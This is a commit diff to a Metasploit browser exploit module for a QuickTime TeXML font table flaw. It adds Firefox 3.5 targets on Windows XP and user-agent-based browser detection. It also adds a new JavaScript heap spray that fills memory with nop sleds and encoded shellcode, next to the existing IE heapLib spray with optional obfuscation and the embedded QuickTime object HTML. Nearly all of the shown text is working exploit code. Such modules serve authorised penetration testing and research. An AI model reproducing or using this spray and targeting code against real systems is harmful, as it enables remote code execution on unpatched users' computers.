targets updated

Author: jvazquez-r7

modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb

@@ -16,10 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	autopwn_info({
 		:os_name    => OperatingSystems::WINDOWS,
 		:javascript => true,
-		:rank       => NormalRanking,
-		:ua_name    => HttpClients::IE,
-		:ua_minver  => "6.0",
-		:ua_maxver  => "7.0"
+		:rank       => NormalRanking
 	})
 
 	def initialize(info = {})
@@ -65,8 +62,8 @@ def initialize(info = {})
 					# Tested with QuickTime 7.7.2
 					[ 'Automatic', {} ],
 					[ 'IE 6 on Windows XP SP3', {} ],
-					[ 'IE 7 on Windows XP SP3', {} ],
-					[ 'IE 7 on Windows Vista', {} ]
+					[ 'Firefox 3.5 on Windows XP SP3', {} ],
+					[ 'Firefox 3.5.1 on Windows XP SP3', {} ]
 				],
 			'Privileged'     => false,
 			'DisclosureDate' => 'Nov 07 2012',
@@ -83,9 +80,18 @@ def get_target(agent)
 		return target if target.name != 'Automatic'
 
 		nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
-		ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
 
-		ie_name = "IE #{ie}"
+		browser_name = ""
+		if agent =~ /MSIE/
+			browser_version = agent.scan(/MSIE (\d)/).flatten[0] || ''
+			browser_name = "IE #{browser_version}"
+		elsif agent =~ /Firefox\/3.5$/
+			browser_name = "Firefox 3.5 "
+		elsif agent =~ /Firefox\/3.5.1$/
+			browser_name = "Firefox 3.5.1"
+		elsif agent =~ /Opera\/9/
+			browser_name = "Opera"
+		end
 
 		case nt
 			when '5.1'
@@ -97,7 +103,7 @@ def get_target(agent)
 		end
 
 		targets.each do |t|
-			if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
+			if (!browser_name.empty? and t.name.include?(browser_name)) and (!nt.empty? and t.name.include?(os_name))
 				print_status("Target selected as: #{t.name}")
 				return t
 			end
@@ -190,7 +196,8 @@ def on_request_uri(client, request)
 			code = Rex::Text.to_unescape(payload.encoded, arch)
 
 			# Spray puts payload on 0x31313131
-			spray = <<-JS
+			if my_target.name =~ /IE/
+				spray = <<-JS
 var heap_obj = new heapLib.ie(0x20000);
 var code = unescape("#{code}");
 var nops = unescape("#{nops}");
@@ -206,15 +213,29 @@ def on_request_uri(client, request)
 for (var i=0; i < 1600; i++) {
 	heap_obj.alloc(block);
 }
-			JS
-
-			#Use heaplib
-			js_spray = heaplib(spray)
-
-			#obfuscate on demand
-			if datastore['OBFUSCATE']
-				js_spray = ::Rex::Exploitation::JSObfu.new(js_spray)
-				js_spray.obfuscate
+				JS
+
+				#Use heaplib
+				js_spray = heaplib(spray)
+
+				#obfuscate on demand
+				if datastore['OBFUSCATE']
+					js_spray = ::Rex::Exploitation::JSObfu.new(js_spray)
+					js_spray.obfuscate
+				end
+			else
+				js_spray = <<-JS
+var shellcode = unescape("#{code}");
+var bigblock = unescape("#{nops}");
+var headersize = 20;
+var slackspace = headersize + shellcode.length;
+while (bigblock.length < slackspace) bigblock += bigblock;
+var fillblock = bigblock.substring(0,slackspace);
+var block = bigblock.substring(0,bigblock.length - slackspace);
+while (block.length + slackspace < 0x40000) block = block + block + fillblock;
+var memory = new Array();
+for (i = 0; i < 750; i++){ memory[i] = block + shellcode }
+				JS
 			end
 
 			content =  "<html>"
@@ -226,6 +247,7 @@ def on_request_uri(client, request)
 </head>
 			JSPRAY
 			content << "<body>"
+
 			content << <<-ENDEMBED
 <OBJECT
 CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
@@ -251,6 +273,7 @@ def on_request_uri(client, request)
 </EMBED>
 </OBJECT>
 				ENDEMBED
+
 			content << "</body></html>"
 
 			send_response(client, content, { 'Content-Type' => "text/html" })